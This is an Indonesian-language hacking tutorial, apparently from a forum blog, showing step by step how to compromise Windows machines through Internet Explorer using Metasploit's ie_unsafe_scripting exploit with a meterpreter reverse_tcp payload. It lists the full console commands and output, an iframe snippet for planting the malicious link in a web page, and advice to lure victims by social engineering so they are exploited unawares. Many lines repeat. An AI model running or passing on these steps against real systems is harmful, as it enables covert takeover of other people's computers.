[TUTORIAL METASPLOIT Part 2]
Level : Networking (BASIC)
Title : Metasploit
Selamat siang
Kali ini saya akan berikan sedikit tutorial bagian kedua dalam sessi Metasploit
Kali ini saya akan berikan sedikit tutorial bagian kedua dalam sessi Metasploit
Tapi sebelumnya, pastikan Anda telah membaca tutorial pertama dan memahaminya, anda bisa baca kembali di link:
https://web.facebook.com/…/1337…/permalink/829253473875957/…
https://web.facebook.com/…/1337…/permalink/829253473875957/…
Dalam tutorial ini, kita akan exploitasi komputer korban dengan memanfaatkan fasilitas browser Microsoft Internet Explorer 6, 7, dan 8, yang berjalan pada Windows XP, Vista, Windows 7 atau Windows Server 2003 dan 2008.
Mungkin anda bbertanya "kenapa mesti exploitasi internet explorer 8???... bukankah kebanyakan user pake firefox / chrome??!".
Tapi disini kita pakai logika:
Internet Explorer 8 masih merupakan browser default yang diinstal pada Windows 7, dan Windows 7 mungkin sistem operasi yang paling banyak digunakan di dunia.
Bukankah ketika anda selesai menginstall windows, anda akan mendapatkan Internet explorer sebagai default browser dan itu Pra-Installer?
Internet Explorer 8 masih merupakan browser default yang diinstal pada Windows 7, dan Windows 7 mungkin sistem operasi yang paling banyak digunakan di dunia.
Bukankah ketika anda selesai menginstall windows, anda akan mendapatkan Internet explorer sebagai default browser dan itu Pra-Installer?
hehe..itu logika sederhana saja, tergantung soceng kita memanfaatkan kelemahan dari sisi user.
oke..kita jalankan Metasploit (Lihat tutorial pertama link pertama di atas).
root@kali:~# msfconsole
root@kali:~# msfconsole
1) Cari Exploit kita akan kita gunakan:
pertama kita cari jenis exploitsi yang kita inginkan dengan perintah "search".
pertama kita cari jenis exploitsi yang kita inginkan dengan perintah "search".
#msf> search type:exploit platform:windows unsafe
anda akan melihat hasil dari pencarian modul,kita akan gunakan:
# exploit/windows/browser/ie_unsafe_scripting
2) Selanjutnya kita memberitahu Metasploit bahwa exploitasi ini yang akan kita gunakan.
Kita menggunakan parameter "use" untuk memasukan perintahnya:
Kita menggunakan parameter "use" untuk memasukan perintahnya:
#msf> use exploit/windows/browser/ie_unsafe_scripting
3) Kemudian pilih payload yang akan digunakan:
Payload adalah sebuah code yang di kirim bersama dengan proses exploitasi, yang nantinya akan dieksekusi pada pc korban.
Pertama kita harus memuat payload - dalam hal ini kita menggunakan, windows / meterpreter / reverse_tcp, perintahnya :
Payload adalah sebuah code yang di kirim bersama dengan proses exploitasi, yang nantinya akan dieksekusi pada pc korban.
Pertama kita harus memuat payload - dalam hal ini kita menggunakan, windows / meterpreter / reverse_tcp, perintahnya :
#msf> set PAYLOAD windows/meterpreter/reverse_tcp
4) Langkah selanjutnya kita atur pilihan exploitasi
Gunakan perintah "show options" untuk menampilkan pilihan exploiternya:
Gunakan perintah "show options" untuk menampilkan pilihan exploiternya:
#msf> show options
nah, payload yang dipilih menuntut kita untuk mengatur LHOST (Local host). Hal ini mengacu pada komputer Anda (Attacker).
Masukkan alamat IP (misalnya 192.168.56.102) dari komputer lokal:
Masukkan alamat IP (misalnya 192.168.56.102) dari komputer lokal:
#msf> set LHOST 192.168.56.101
Jenis exploitasi ini adalah exploitasi dari sisi client, yang berarti dijalankan pada komputer korban ketika mereka membuka link yang kita kirim. dan eksploitasi lain mungkin mengharuskan Anda untuk memasukkan RHOST, yang merupakan alamat IP target.
5) Jalankan Eksploitasi
Untuk menjalankan mengeksploitasi, cukup ketik:
Untuk menjalankan mengeksploitasi, cukup ketik:
#msf> exploit (ie_unsafe_scripting) > exploit
kalau session berhasil anda akan mendapatkan result:
#msf>exploit(ie_unsafe_scripting) >
[*] Request received from 192.168.56.102:1080...
[*] Encoding payload into vbs/javascript/html...
[*] Sending exploit html/javascript to 192.168.56.102:1080...
[*] Exe will be uunqgEBHE.exe and must be manually removed from the %TEMP% directory on the target.
Sending stage (752128 bytes) to 192.168.56.102
[*] Meterpreter session 1 opened (192.168.56.101:4444 ->192.168.56.102:1081) at 2016-08-03 14:09:26 +0530
[*] Request received from 192.168.56.102:1080...
[*] Encoding payload into vbs/javascript/html...
[*] Sending exploit html/javascript to 192.168.56.102:1080...
[*] Exe will be uunqgEBHE.exe and must be manually removed from the %TEMP% directory on the target.
Sending stage (752128 bytes) to 192.168.56.102
[*] Meterpreter session 1 opened (192.168.56.101:4444 ->192.168.56.102:1081) at 2016-08-03 14:09:26 +0530
Ini akan menghasilkan link - link berbahaya - yang kita kirim ke komputer target, dan berharap mereka membukanya dengan sedikit SOCENG.
Ketika target membuka link dalam versi internet explorer, itu akan mengeksploitasi browser mereka dan kita menguasai komputer mereka.
Berikut adalah cara yang baik untuk mengeksploitasi browser target tanpa mereka sadari:
Ketika target membuka link dalam versi internet explorer, itu akan mengeksploitasi browser mereka dan kita menguasai komputer mereka.
Berikut adalah cara yang baik untuk mengeksploitasi browser target tanpa mereka sadari:
Cattan: Dengan sedikit kode HTML sederhana, kita bisa menambahkan link dengan menanam "iframe" pada source halaman web.
Untuk melakukannya, kita hanya menambahkan kode html ini di mana saja di dalam <body> halaman Anda:
misal :
Untuk melakukannya, kita hanya menambahkan kode html ini di mana saja di dalam <body> halaman Anda:
misal :
<Iframe src = "http://192.168.56.101:8080/2IGIaOJQB"> </ iframe>
Ketika halaman ini buka pada komputer korban, browser mereka akan dieksploitasi,
7) selanjutnya kita buka session yang sedang berjalan tersebut, dengan mengetik perintah :
# msf> exploit (ie_unsafe_scripting) > sessions
8)Selanjutnya kita buat channel aktiv untuk windows target dengan mengetikan perintah sessions -i 1:
#msf> exploit (ie_unsafe_scripting) > sessions -i 1
meterpreter > shell
Process 4844 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7264]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:Windowssystem32>
meterpreter > shell
Process 4844 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7264]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:Windowssystem32>
dan itu akan membuka sesi meterpreter aktif yang sedang kita gunakan, kita bisa mengendalikan komputer mereka.
ini yang saya namakan "kuasai komputer korban dalam jaringan"
ini yang saya namakan "kuasai komputer korban dalam jaringan"
Demikian, sedikit tutorial cara exploitasi browser default windows
kita lanjut dengan methode exploitasi lainnya di tutorial selanjutnya
kita lanjut dengan methode exploitasi lainnya di tutorial selanjutnya
Enjoy
Luciffer
Luciffer
makasih om atas ilmunya
sumber official 1337cyberindo
0 comments:
Post a Comment